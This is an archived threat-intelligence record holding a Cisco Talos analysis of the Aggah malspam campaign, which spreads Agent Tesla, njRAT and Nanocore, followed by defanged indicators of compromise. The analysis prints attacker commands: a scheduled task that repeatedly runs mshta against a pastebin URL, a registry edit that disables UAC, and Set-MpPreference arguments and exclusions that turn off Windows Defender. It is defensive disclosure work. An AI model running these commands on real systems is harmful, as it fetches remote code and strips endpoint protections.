{
	"id": "228ad72c-cbf1-4d6f-be5d-26c0c44701c8",
	"created_at": "2026-04-06T00:08:48.607437Z",
	"updated_at": "2026-04-10T03:33:12.460109Z",
	"deleted_at": null,
	"sha1_hash": "647a249f79356be4a65f832fb13bba46db401089",
	"title": "Upgraded Aggah malspam campaign delivers multiple RATs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 630826,
	"plain_text": "Upgraded Aggah malspam campaign delivers multiple RATs\r\nBy Asheer Malhotra\r\nPublished: 2020-04-29 · Archived: 2026-04-05 17:48:34 UTC\r\nWednesday, April 29, 2020 11:48\r\nBy Asheer Malhotra\r\nCisco Talos has observed an upgraded version of a malspam campaign known to distribute multiple remote\r\naccess trojans (RATs).\r\nThe infection chain utilized in the attacks is highly modularized.\r\nThe attackers utilize publicly available infrastructure such as Bitly and Pastebin (spread over a number of\r\naccounts) to direct and host their attack components.\r\nNetwork-based detection, although important, should be combined with endpoint protections to combat\r\nthis threat and provide multiple layers of security.  \r\nWhat’s New?\r\nCisco Talos has observed a new Aggah campaign consisting of the distribution of malicious Microsoft Office\r\ndocuments (maldocs) via malicious spam (malspam) emails distributing a multi-stage infection to a target user’s\r\nendpoint.\r\nThe final payload of the infection consists of a variety of Remote-Access-Tool (RAT) families such as:\r\nAgent Tesla\r\nnjRAT\r\nNanocore RAT\r\nHow did it work?\r\nMany attackers and malware operators usually utilize their own infrastructure (or hacked domains) to act as\r\ndelivery mechanisms for their infection chains. Consistent with previous Aggah campaigns, this campaign also\r\nfocuses on the use of pastebin[.]com for all its infrastructure needs. However, this campaign now utilizes multiple\r\nPastebin accounts to host different stages of the attack.\r\nThe key components of the attack are:\r\nStage 1: Malspam delivering documents with malicious macros.\r\nStage 2: Malicious VBScripts used to instrument the actual attack.\r\nStage 2A: Malicious .Net based binaries for disabling security features on the endpoint.\r\nStage 3: Malicious VBScripts and .NET-based injectors and RATs (final payload).\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 1 of 12\n\nSo what?\r\nThe Aggah campaign has been quite prolific recently and the attackers have used their own infrastructure, as well\r\nas hosting sites such as Pastebin to host their infection components.\r\nThis new campaign, however, introduces a few key upgrades to the attack chain:\r\nUse of an additional .NET binary (and embedded VBScript and PowerShell scripts) to disable protection\r\nand detection mechanisms on the infected endpoint.\r\nDistribution of attack components (scripts and encoded MZs) across multiple free Pastebin accounts to\r\nmodularize the attack infrastructure.\r\nUse of a new Pastebin PRO account to host all the final RAT payloads. This also indicates the move from\r\nthe “hagga” to the “alphabets3” Pastebin account for continued operations (a pro account enables the\r\nattackers to modify the pastes and serve different malware at different points in time).\r\nInitial infection vector\r\nThis threat arrives on the endpoint typically as a malicious email. The email attempts to appear legitimate while\r\nbeing vague at the same time. This is done to trick the target end-user into opening the malicious attachment\r\n(maldoc) that activates the infection on the endpoint.\r\nA typical malspam email for this threat looks like:\r\nMalicious document analysis\r\nThe maldocs distributed by this threat contain a simple and effective VB macro script that is used to download the\r\nnext stage of the infection and execute it on the endpoint.\r\nThe maldocs themselves are essentially empty and contain minimal to no content in them.\r\nSome examples of the names of the maldocs distributed by this threat:\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 2 of 12\n\nItems List.csv\r\nPO#422511 Hager.xls\r\nPurchase Order.xls\r\nRequest for Quotation.xls\r\nRFQ Air Shipment.csv\r\nRFQ List #422513.csv\r\nRFQ List #422513..csv\r\nRFQ List #422513 t.csv\r\nSpecification sheet and P.o 3053432.xls\r\nMalicious VBA analysis\r\nOnce opened, the malicious VBA contacts a shortened “j.mp” URL (redirects to pastebin[.]com) that points to the\r\nnext stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on\r\nPastebin URLs.\r\nTypical examples of the VB macro are:\r\nNewer versions of the macro also aim to establish persistence via the Windows registry for the second-stage\r\npayload’s execution using mshta.\r\nThe persistence is set up in the registry key:\r\nHKCU/Software/Microsoft/Windows/CurrentVersion/Run/\r\nInfection Stage 2: Mshta script\r\nThe second-stage payload downloaded by the maldoc’s macro and executed using mshta is an escaped VBScript.\r\nThe second-stage payload carries out the following actions:\r\n1. Setup a malicious scheduled task for another component (payload Stage 3 — Activate RAT payload) using\r\nthe schtasks command. E.g\r\nschtasks /create /sc MINUTE /mo 70 /tn \u003ctask_name\u003e /tr \"\"mshta\r\nhttp://pastebin.com/raw/\u003cresource_id\u003e\"\" /F\r\n1. [Optional] Establish persistence for itself or another component (defined by another pastebin URL).\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 3 of 12\n\n2. Download a .NET executable for windows and execute it (payload stage 2A). This executable is designed\r\nto disable security features on the endpoint to evade detection.\r\nDeobfuscated second-stage payload:\r\nThe entire infection chain is illustrated here for a better understanding of the highly modularized attack:\r\nInfection Stage 2A: Elevate, evade, disable\r\nThis component is responsible for ensuring the seamless execution of the infection chain. It is implemented as a\r\n.NET based executable that in-turn executes an elevated VBscript to disable various protection mechanisms so\r\nthat it can evade detection on the endpoint.\r\nThe executable extracts the VBS from its resources and dumps it into a randomly named VBS file. The executable\r\nalso creates an ‘inf’ file that is then used to execute the malicious VBS using “cmstp” (cmstp.exe is used as a\r\nmeans of UAC bypass here).\r\nStructure of the inf file:\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 4 of 12\n\nIn order to ensure AV evasion the following actions are taken by the VBS:\r\n1. Ensure that the script is running with elevated privileges, else restart with elevated permissions.\r\n2. Disable UAC notifications by modifying registry value “EnableLUA” using command:\r\nC:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t\r\nREG_DWORD /d 0 /f\r\n1. Disable Windows Defender features by running powershell cmdlet “Set-MpPreference” with arguments:\r\n-DisableRealtimeMonitoring $true\r\n-DisableBehaviorMonitoring $true\r\n-DisableBlockAtFirstSeen $true\r\n-DisableIOAVProtection $true\r\n-DisableScriptScanning $true\r\n-SubmitSamplesConsent 2\r\n-MAPSReporting 0\r\n-HighThreatDefaultAction 6 -Force\r\n-ModerateThreatDefaultAction 6\r\n-LowThreatDefaultAction 6\r\n-SevereThreatDefaultAction 6\r\n1. Use PowerShell to create process and path exclusions for Windows Defender scans for\r\nPaths:\r\nC:\\\r\nD:\\\r\nProcesses:\r\nMsbuild.exe\r\nCalc.exe\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 5 of 12\n\nA sample exclusions-enforcement script:\r\nInfection Stage 3\r\nThis payload is a VBScript designed to instrument a .NET based injector component that activates a RAT payload\r\n(the final stage) on the infected endpoint.\r\nA typical stage 3 payload looks like:\r\nThe infection/injection process works as follows:\r\n1. The Stage 3 payload VBScript downloads the injector instrumentation script from a  Pastebin URL.\r\n2. The injector instrumentation script decompresses the injector binary (a .NET based DLL) and loads it into\r\nmemory ready to be executed via an exported API of the DLL.\r\n3. The RAT payload is then downloaded and decoded.\r\n4. An API of the injector DLL is then called to inject the RAT payload into a specified benign process.\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 6 of 12\n\n5. The API accepts a benign executable’s name (such as “calc.exe”), spawns a new suspended process and\r\nuses process-hollowing to inject and activate the RAT payload on the infected endpoint.\r\nThis technique of decompressing the injector and subsequent injection of the final payload into a benign process\r\nusing process-hollowing has been extensively used by the DarkComet malware family. As seen in this campaign\r\n(and other campaigns leveraging DarkComet), the injector component (DLL) is usually obfuscated to make\r\nanalysis difficult.\r\nSub-component script that decompresses the injector module:\r\nFinal stage: RAT components\r\nThe final malware payloads served by such campaigns can vary from ransomware to RAT families. In the case of\r\nthe campaign disclosed here, we have observed multiple families being distributed:\r\nAgent Tesla\r\nnjRAT\r\nNanocore RAT\r\nPastebin accounts\r\nThe following pastebin accounts have been used to host malicious code for this campaign on Pastebin:\r\nhxxps://pastebin[.]com/u/bakeitup\r\nhxxps://pastebin[.]com/u/bakeitup1\r\nhxxps://pastebin[.]com/u/gogga4\r\nhxxps://pastebin[.]com/u/gogga7\r\nhxxps://pastebin[.]com/u/moneyneeded\r\nhxxps://pastebin[.]com/u/timenamoney\r\nhxxps://pastebin[.]com/u/hushpuppi44\r\nhxxps://pastebin[.]com/u/mompha1\r\nhxxps://pastebin[.]com/u/alphabates3\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 7 of 12\n\nOut of all these accounts, the “alphabates3” stands out specifically. This is a PRO account. A pro account enables\r\nthe operator to modify the content of already created pastes. Also, this account hosts all the RAT payload samples\r\ndiscovered in this campaign so far, Thus it is highly likely that the attackers modify existing pastes to re-instrument infection chains to deliver different malware at different points in time.\r\nConclusion\r\nThe actors behind this campaign are clearly motivated and continue to operate leveraging freely available\r\ninfrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics\r\nranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that\r\nthese actors continue to distribute a wide variety of malware indicates that they are constantly growing their\r\nmalware arsenal. The campaign started in January 2020 and is still ongoing. This campaign also shows us that\r\nwhile network-based detection is important, it must be complemented with system behavior analysis and endpoint\r\nprotections.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this\r\npost. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 8 of 12\n\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nThreat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nAdditional protections with context to your specific environment and threat data are available from the Firepower\r\nManagement Center.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. The following Snort SIDs were released to detect this threat: 53745 - 53748.\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected\r\nwith this specific threat. For specific OSqueries on this threat, click below:\r\nIOCs\r\nEmail messages:\r\naf70b67e70ba11e54deefc140b9fda0e7fe918f8bf1cf19eb184278c20ded621\r\nMaldocs:\r\na4931fd893b630efa9b4cf7c7ca1a1b7827ec2cef7d270baaa7737b4103be235\r\n39d059d7891d0b194face48f21093f6de9ae14e3f788f8a30c128398a0bf545c\r\nee913965822c4bbd2454a497431a82cb9d5fb360f51f313519fb132dc0532f67\r\n23d1a8e46a5713a39a7d636e9d22d3c24237a09f51248b7cfc421e99056c5c6b\r\n85f7e45904e059698dca69aefd0f49c1ac7434703f6d4eb913e95de5b8162df6\r\ncac81dd6d21cd8011f819fe998684e5f91710661b5cb7a2598fc0623dbe2b1ce\r\n1fc6f05a4a0947806e0c77492c6afe5a4f8ce20c4450ebbf2eb35818f8962210\r\n40d72cad9e7c10eb1b2415148cd641f8425419ace468ee3f418849d9675b8f0d\r\n6c6d611e629030213f065c058a969d3f19f91dfb2fe78c15acbabb9e687321ed\r\n733b3e58c8b7280cb351539dfd4f0cf57be967a595a4ac237369f6f80a3be926\r\n0eb1f2c85d6c1fcbb1546cec47d572245e291f3522e5fc49cfbe47f9415c8539\r\n20e0a74e41af798ff364ca479630d120ed0f9d990ad097f30e75f632d6a0c3f9\r\n238c97a1150ab97f075d40aec1fddff80a0cd5ad5c551e23c4144ff6dfc8f91d\r\nMalicious Scripts and MZs:\r\n1038e891dc459285da10f15d7ef679588f6d80a661c7f92dee44487003d0f76d\r\n35f523e5de8e240c9ae8f20d198a4bfde3877631390f24e2dc877223bdce5045\r\n73000931708116073e9bf7f326497564677fb9e36cd2195523e68376da2e44cd\r\n98ebeb1b1e6f97222680028d4e100c9bd0663cb953003382846432dc2adb23c2\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 9 of 12\n\n0a32978459907400ee525773ed2c7fd1521ceda18b75bd5f01645e9522eb5f81\r\n70370381401dafa66b29ec8029d382bfcffedd3cc5e44290cb3fefa728347730\r\n80707eab36cebfb26becd728e5dd155c22d0d272f1f62a9acd17abed6feccd8a\r\n7ec1cb6e477faea97fb78093c857099e4fdf72f535cab3433cdeb40a282e6359\r\ndbe17317d20e8d6b308b5ce32a53fd0b02b0d9914cafcceed06790a62da17c2d\r\nc9d7b63c671f24c049f711c361f1cb92780f838729b2acbe48bb906037347467\r\n913cc2d81a99ec7def735f16761390d0c4f47f28889ecf047525d2f86ff01011\r\ne82fea3940cd5d89202ef5a6fb236696d8364e232e7b6413a838b276fed916bb\r\nf55eb5d585d55b0cf4e00d0a97f8d9941f6547b0cfb314ac26f00a184cd3ab38\r\n595e06556d773d2c87671c817499f13500a910ddab31a0bd6f9e31fc8f46b5dc\r\n09050292abe61da2e39f0c16d2d10f8f7aa70b67b8a6c358724187131d1e3879\r\n23b2f5919d0b943effd748f6341e7dac16e2cc6f65d972f1cac8630c6ea6c524\r\ne742e2858352ad1da32cd45769ba6434aeea7465440667ffc1858c1ba0c8a1f6\r\n3a95d34385daf5fd45467767174ea2524d09396961d8f9ed180ff034604ba467\r\nf78311bc3b478929ccccd51c73e5e270f73db256a110821ca8adb6ef848ffa9d\r\ncba31bbe59853a2dd3a5b0c28b2d960c1292ea13571f08753079e067d2d1d6f3\r\nb2f2c8fe5e31a7c127f55aebae9e57e6347c432ba1c551a75f3372a373393a32\r\n28544b668b766853540aec755f73785ef0e644b21f1fa5f181d924a67f41acae\r\n0f2af9064dabe99260dac84facf4bd1e18051fa989a88e227e3b4684a9697274\r\n2dca36ce5e6d5e6ac382cda2562bc8783eb85053449cb790804b463a64effa67\r\n3ae524895fc071aa931d196767a4d6573e1cf57bfd500ccef7377696e080e702\r\n510b4ce5fb8c87120e28f3c06fb776564aedbcb483240b6b48aa1aada173e82b\r\n225f8bf058226e66ab7590c6f23235668cddb32e37a300d3994406875803c8c1\r\n0364b894e8c3234f2566b7368eecbdb264fa84e2ac7dd494acb9cce9a3ffc74e\r\n2e1af852e853a6841bb58891dea8529bd8458a1ee57595235a1632e71cb3ca59\r\n97931e1e8bdc57f2023b749b700139184c82ad646c97e9cf889f4a2c853f2408\r\nb0aae401bbca253a323b4591f41a69435617992f06e6df07e367184665edfd6e\r\n6045833390cdc30f440a9c5ec0922ae691e427a0e8d6b4750fe6a92e73cf1305\r\n3c657ad3b87ee8f3f666f0d3c93344a770e68119597f182fb128884cfccce35c\r\n2eb47fa90ad933efb1dccc31f18b824ad560dd16e1b8aad3d7004bfc2018180a\r\n23e86df6daedf7aa13aded2f9123fdba812aa60bc30930a5db661a26958c4128\r\nc9ead4ece5af03b5050a4c541c5f89a8eea047a32e697e307d93979e58ccb987\r\n06924e5a0171b69f5e406317994e8f485d30ae404471aad9b5501497d1acfcf7\r\nShortened URLs:\r\nhxxp://j[.]mp/jaosidna8sxnasox\r\nhxxp://j[.]mp/ksxkssxksis8ijsjlsiajasldm\r\nhxxp://j[.]mp/ajsixans7xnasixn\r\nhxxp://j[.]mp/lkslsodkdfd9sods0kdsodo\r\nhxxp://j[.]mp/osasdkasdjsajasdiskdisdks\r\nhxxp://j[.]mp/asxlijlcsdoicdcli8lkjdclid9k\r\nhxxp://j[.]mp/sodkidkcikiksopsk9ksis6so\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 10 of 12\n\nhxxp://j[.]mp/ksxkssxksis8ijsjlsiajasldm\r\nhxxp://j[.]mp/ksossksxmsxsxk8su7sjsx7j\r\nhxxp://j[.]mp/qidusldsidadkfmd9klkdkfk\r\nhxxp://j[.]mp/siadljas8asldkasd8asdl9sal\r\nhxxp://j[.]mp/jsakdiuksajsjaskkusk8ilas89\r\nhxxp://j[.]mp/nlkskjldu8sjlkdjkkljsmk\r\nhxxp://j[.]mp/asniasnxa8sxnasx\r\nUn-shortened URLs:\r\nhxxps://pastebin[.]com/SwJZ13TN\r\nhxxps://pastebin[.]com/RaA9aSiP\r\nhxxp://pastebin[.]com/YdNbhM9i\r\nhxxp://pastebin[.]com/rjjL3Q8k\r\nhxxps://pastebin[.]com/Xb567gn8\r\nhxxps://pastebin[.]com/guSD8kh8\r\nhxxps://pastebin[.]com/RCqXukvb\r\nhxxps://pastebin[.]com/5rM3ub4T\r\nhxxps://pastebin[.]com/8zispntq\r\nhxxp://pastebin[.]com/zKCiQThE\r\nhxxp://pastebin[.]com/U15y8Bqw\r\nhxxp://pastebin[.]com/vFGssbqR\r\nhxxps://pastebin[.]com/csVu7iV8\r\nhxxps://pastebin[.]com/pyN42ZYy\r\nhxxps://pastebin[.]com/PKuEeY0J\r\nhxxp://pastebin[.]com/TnesjzNM\r\nhxxps://pastebin[.]com/baejJ2xR\r\nhxxps://pastebin[.]com/2kzmttx1\r\nhxxp://pastebin[.]com/CSV8Dth1\r\nhxxp://pastebin[.]com/bDXVQe7R\r\nhxxps://pastebin[.]com/36RHyFyF\r\nhxxp://pastebin[.]com/CixwEA8N\r\nhxxps://pastebin[.]com/sM2bDvwq\r\nhxxps://pastebin[.]com/8YC77fsA\r\nhxxp://pastebin[.]com/uPTChJVZ\r\nhxxp://pastebin[.]com/VWyW3BuS\r\nhxxps://pastebin[.]com/MhUM7FWE\r\nhxxp://pastebin[.]com/fE0jKtBG\r\nhxxps://pastebin[.]com/T8BdJPKH\r\nhxxps://pastebin[.]com/rtrp8wut\r\nhxxp://pastebin[.]com/kQJkvnnN\r\nhxxp://pastebin[.]com/WYgTPRqh\r\nhxxps://pastebin[.]com/RaA9aSiP\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 11 of 12\n\nhxxp://pastebin[.]com/8cP9QQjY\r\nhxxps://pastebin[.]com/bXms4JQj\r\nhxxps://pastebin[.]com/DGbjqyTK\r\nhxxp://pastebin[.]com/p826zZ7D\r\nhxxp://pastebin[.]com/Td6Tz6ex\r\nhxxps://pastebin[.]com/zyD07eCr\r\nhxxp://pastebin[.]com/gNnGrGZN\r\nhxxps://pastebin[.]com/7XXUx05w\r\nhxxps://pastebin[.]com/8EJgcnsp\r\nhxxp://pastebin[.]com/2RqBe3QU\r\nhxxp://pastebin[.]com/C3YRjE9a\r\nhxxps://pastebin[.]com/m3evTWbt\r\nhxxp://pastebin[.]com/a09Gx0W9\r\nhxxps://pastebin[.]com/wDEMiAAj\r\nhxxps://pastebin[.]com/mZZnwJtJ\r\nhxxp://pastebin[.]com/YwpcGxY4\r\nhxxp://pastebin[.]com/FnMCBZ0u\r\nhxxps://pastebin[.]com/pna1Wj3c\r\nhxxp://pastebin[.]com/dYM4umF9\r\nhxxps://pastebin[.]com/0zS4KLgn\r\nhxxps://pastebin[.]com/YnAjfeQs\r\nhxxp://pastebin[.]com/m0H2a9fp\r\nhxxp://pastebin[.]com/mPis0Xvi\r\nhxxps://pastebin[.]com/KsA0LByu\r\nhxxp://pastebin[.]com/m8ZcGw0A\r\nhxxps://pastebin[.]com/dVypbwUf\r\nhxxps://pastebin[.]com/uB8QAVxC\r\nhxxp://pastebin[.]com/7nU4s1hk\r\nhxxp://pastebin[.]com/arraKbed\r\nhxxps://pastebin[.]com/Z4yWKizU\r\nhxxp://pastebin[.]com/DRxejwps\r\nhxxps://pastebin[.]com/Q8sXxPy3\r\nhxxps://pastebin[.]com/zU5m82z3\r\nhxxp://pastebin[.]com/N1U2YYKH\r\nhxxps://pastebin[.]com/K8UT9fsu\r\nhxxp://pastebin[.]com/AW2dAGXF\r\nhxxps://pastebin[.]com/rF8FbZ6p\r\nhxxp://pastebin[.]com/huPdXJ7g\r\nhxxps://pastebin[.]com/GrJj48eQ\r\nSource: https://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html"
	],
	"report_names": [
		"upgraded-aggah-malspam-campaign.html"
	],
	"threat_actors": [
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434128,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.pdf",
		"text": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.txt",
		"img": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.jpg"
	}
}